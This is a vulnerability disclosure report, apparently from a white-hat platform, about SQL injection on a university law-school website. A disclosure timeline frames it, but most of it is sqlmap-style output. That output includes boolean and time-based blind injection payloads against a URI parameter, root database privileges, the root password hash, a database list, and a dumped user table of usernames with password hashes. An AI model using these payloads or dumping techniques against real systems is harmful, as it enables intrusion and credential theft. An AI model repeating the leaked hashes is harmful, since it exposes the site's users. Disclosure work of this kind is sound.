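2015-08-23: Details reported to the vendor; awaiting vendor handling
2015-08-24: Vendor confirmed; details disclosed to the vendor only
2015-09-03: Details disclosed to core white hats and experts in related fields
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public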
**.**.**.**/index.php/Index/content_zh/id/1220*/link/rcpy
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/index.php/Index/content_zh/id/1220 AND 8903=8903/link/rcpy

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://**.**.**.**:80/index.php/Index/content_zh/id/1220 AND SLEEP(5)/link/rcpy
---
[23:08:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
The injection exists; next, dumping everything.
database management system users privileges:
[*] %root% (administrator) [25]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: UPDATE

database management system users password hashes:
[*] root [1]:
    password hash: *2F1C808CCFD375BF1AABB2943B09DDBFFA8B9820
[23:24:27] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[23:25:07] [INFO] fetching current database
[23:25:07] [INFO] retrieved: wuhanlaw
current database: 'wuhanlaw'
[23:25:31] [INFO] testing if current user is DBA
[23:25:31] [INFO] fetching current user
current user is DBA: True
available databases [11]:
[*] a0104225036
[*] information_schema
[*] interwhuedu_0
[*] interwhuedu_en_0
[*] interwhuedu_privatelaw
[*] lawwhuedu_0
[*] makc_jjh
[*] mysql
[*] test
[*] wuhanlaw
[*] wuhanlaw2
Database: wuhanlaw
Table: ch_user
[3 entries]
+-------------+----------------------------------+
| username    | password                         |
+-------------+----------------------------------+
| dengzhaohui | 43b1fc9f90ddeb23b6107d43332e2c35 |
| admin       | 58756385857be77381619183339c7f07 |
| anying      | 9561a6f1aad6fef99dfeffcecdd04cc4 |
+-------------+----------------------------------+
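OK, this is an education network site and this was a friendly test, so I am stopping here.
Same as above.
You are the professionals.
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-08-24 08:23
Notified; being handled
None yet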